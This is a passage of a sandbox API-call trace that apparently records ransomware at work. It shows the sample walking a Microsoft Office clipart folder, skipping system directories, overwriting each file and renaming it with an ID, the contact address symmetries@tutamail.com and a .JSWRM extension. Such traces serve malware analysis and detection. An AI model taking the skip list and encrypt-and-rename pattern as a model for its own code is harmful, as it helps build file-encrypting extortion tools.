RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1840) returned 0x205850 [0096.803] ReadFile (in: hFile=0x314, lpBuffer=0x205850, nNumberOfBytesToRead=0x1840, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345e89c*=0x1840, lpOverlapped=0x0) returned 1 [0096.849] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0096.849] WriteFile (in: hFile=0x314, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x1840, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345e898*=0x1840, lpOverlapped=0x0) returned 1 [0096.849] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0096.849] CloseHandle (hObject=0x314) returned 1 [0096.850] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2100c0 [0096.850] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0096.850] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0096.850] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0096.850] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0096.850] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0096.850] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0096.850] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3f0 [0096.850] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3f0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0096.850] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3f0 | out: hHeap=0x1e0000) returned 1 [0096.850] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d878 [0096.850] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247e68 [0096.850] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d878 | out: hHeap=0x1e0000) returned 1 [0096.850] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0096.850] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00736_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00736_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00736_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00736_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0096.851] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247e68 | out: hHeap=0x1e0000) returned 1 [0096.851] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2100c0 | out: hHeap=0x1e0000) returned 1 [0096.851] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210e68 | out: hHeap=0x1e0000) returned 1 [0096.851] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x10386305, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x10386305, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x10386305, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x543a, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="SO00768_.WMF", cAlternateFileName="")) returned 1 [0096.851] lstrcmpiW (lpString1="SO00768_.WMF", lpString2=".") returned 1 [0096.852] lstrcmpiW (lpString1="SO00768_.WMF", lpString2="..") returned 1 [0096.852] lstrcmpiW (lpString1="SO00768_.WMF", lpString2="...") returned 1 [0096.852] lstrcmpiW (lpString1="SO00768_.WMF", lpString2="windows") returned -1 [0096.852] lstrcmpiW (lpString1="SO00768_.WMF", lpString2="recovery") returned 1 [0096.852] lstrcmpiW (lpString1="SO00768_.WMF", lpString2="perflogs") returned 1 [0096.852] lstrcmpiW (lpString1="SO00768_.WMF", lpString2="documents and settings") returned 1 [0096.852] lstrcmpiW (lpString1="SO00768_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0096.852] lstrcmpiW (lpString1="SO00768_.WMF", lpString2="system volume information") returned -1 [0096.852] lstrcmpiW (lpString1="SO00768_.WMF", lpString2="msocache") returned 1 [0096.852] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0096.852] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO00768_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0096.852] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO00768_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SO00768_.WMF", lpUsedDefaultChar=0x0) returned 12 [0096.852] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0096.852] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0096.852] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO00768_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0096.852] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO00768_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SO00768_.WMF", lpUsedDefaultChar=0x0) returned 12 [0096.852] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0096.852] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ca0 [0096.852] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20ff90 | out: hHeap=0x1e0000) returned 1 [0096.852] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0096.852] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0096.852] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2101f0 [0096.852] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00768_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00768_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0096.853] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=21562) returned 1 [0096.853] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0096.853] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x5430) returned 0x24d210 [0096.854] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x5430, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x5430, lpOverlapped=0x0) returned 1 [0096.857] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0096.857] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x5430, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x5430, lpOverlapped=0x0) returned 1 [0096.857] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0096.857] CloseHandle (hObject=0x314) returned 1 [0096.857] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x20ff90 [0096.857] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0096.857] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0096.857] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0096.857] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0096.857] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0096.857] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0096.857] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a360 [0096.857] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a360, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0096.857] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a360 | out: hHeap=0x1e0000) returned 1 [0096.857] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d530 [0096.857] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2477a0 [0096.857] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d530 | out: hHeap=0x1e0000) returned 1 [0096.857] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0096.857] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00768_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00768_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00768_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00768_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0096.858] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2477a0 | out: hHeap=0x1e0000) returned 1 [0096.858] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20ff90 | out: hHeap=0x1e0000) returned 1 [0096.858] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2101f0 | out: hHeap=0x1e0000) returned 1 [0096.858] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x10386305, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x10386305, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x10386305, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x16ee, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="SO00783_.WMF", cAlternateFileName="")) returned 1 [0096.858] lstrcmpiW (lpString1="SO00783_.WMF", lpString2=".") returned 1 [0096.858] lstrcmpiW (lpString1="SO00783_.WMF", lpString2="..") returned 1 [0096.858] lstrcmpiW (lpString1="SO00783_.WMF", lpString2="...") returned 1 [0096.859] lstrcmpiW (lpString1="SO00783_.WMF", lpString2="windows") returned -1 [0096.859] lstrcmpiW (lpString1="SO00783_.WMF", lpString2="recovery") returned 1 [0096.859] lstrcmpiW (lpString1="SO00783_.WMF", lpString2="perflogs") returned 1 [0096.859] lstrcmpiW (lpString1="SO00783_.WMF", lpString2="documents and settings") returned 1 [0096.859] lstrcmpiW (lpString1="SO00783_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0096.859] lstrcmpiW (lpString1="SO00783_.WMF", lpString2="system volume information") returned -1 [0096.859] lstrcmpiW (lpString1="SO00783_.WMF", lpString2="msocache") returned 1 [0096.859] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0096.859] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO00783_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0096.859] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO00783_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SO00783_.WMF", lpUsedDefaultChar=0x0) returned 12 [0096.859] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0096.859] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0096.859] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO00783_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0096.859] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO00783_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SO00783_.WMF", lpUsedDefaultChar=0x0) returned 12 [0096.859] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0096.859] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x20ff90 [0096.859] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ca0 | out: hHeap=0x1e0000) returned 1 [0096.859] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0096.859] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0096.859] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210028 [0096.859] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00783_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00783_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0096.860] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=5870) returned 1 [0096.860] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0096.860] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x16e0) returned 0x205850 [0096.860] ReadFile (in: hFile=0x314, lpBuffer=0x205850, nNumberOfBytesToRead=0x16e0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345e89c*=0x16e0, lpOverlapped=0x0) returned 1 [0096.861] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0096.862] WriteFile (in: hFile=0x314, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x16e0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345e898*=0x16e0, lpOverlapped=0x0) returned 1 [0096.862] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0096.862] CloseHandle (hObject=0x314) returned 1 [0096.862] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2101f0 [0096.862] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0096.862] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0096.862] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0096.862] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0096.862] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0096.862] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0096.862] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3a8 [0096.862] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3a8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0096.862] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3a8 | out: hHeap=0x1e0000) returned 1 [0096.862] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d3e0 [0096.863] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2476a8 [0096.863] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d3e0 | out: hHeap=0x1e0000) returned 1 [0096.863] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0096.863] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00783_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00783_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00783_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00783_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0096.864] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2476a8 | out: hHeap=0x1e0000) returned 1 [0096.864] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2101f0 | out: hHeap=0x1e0000) returned 1 [0096.864] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210028 | out: hHeap=0x1e0000) returned 1 [0096.864] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x10360091, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x10360091, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x10360091, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x41c2, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="SO00820_.WMF", cAlternateFileName="")) returned 1 [0096.864] lstrcmpiW (lpString1="SO00820_.WMF", lpString2=".") returned 1 [0096.864] lstrcmpiW (lpString1="SO00820_.WMF", lpString2="..") returned 1 [0096.864] lstrcmpiW (lpString1="SO00820_.WMF", lpString2="...") returned 1 [0096.864] lstrcmpiW (lpString1="SO00820_.WMF", lpString2="windows") returned -1 [0096.864] lstrcmpiW (lpString1="SO00820_.WMF", lpString2="recovery") returned 1 [0096.864] lstrcmpiW (lpString1="SO00820_.WMF", lpString2="perflogs") returned 1 [0096.864] lstrcmpiW (lpString1="SO00820_.WMF", lpString2="documents and settings") returned 1 [0096.864] lstrcmpiW (lpString1="SO00820_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0096.864] lstrcmpiW (lpString1="SO00820_.WMF", lpString2="system volume information") returned -1 [0096.864] lstrcmpiW (lpString1="SO00820_.WMF", lpString2="msocache") returned 1 [0096.864] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0096.864] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO00820_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0096.864] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO00820_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SO00820_.WMF", lpUsedDefaultChar=0x0) returned 12 [0096.864] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0096.864] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0096.864] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO00820_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0096.864] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO00820_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SO00820_.WMF", lpUsedDefaultChar=0x0) returned 12 [0096.864] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0096.864] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210e68 [0096.864] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20ff90 | out: hHeap=0x1e0000) returned 1 [0096.864] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0096.864] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0096.864] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210288 [0096.864] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO00820_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so00820_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0096.865] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=16834) returned 1 [0096.865] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0096.865] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x41c0) returned 0x24d210 [0096.865] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x41c0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x41c0, lpOverlapped=0x0) returned 1 [0096.867] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0096.867] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x41c0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x41c0, lpOverlapped=0x0) returned 1 [0096.868] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0096.868] CloseHandle (hObject=0x314) returned 1 [0096.868] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210320 [0096.868] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0096.868] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0096.868] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0096.868] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0096.868] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0096.868] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0096.868] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a438 [0096.868] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a438, cchWideChar=8 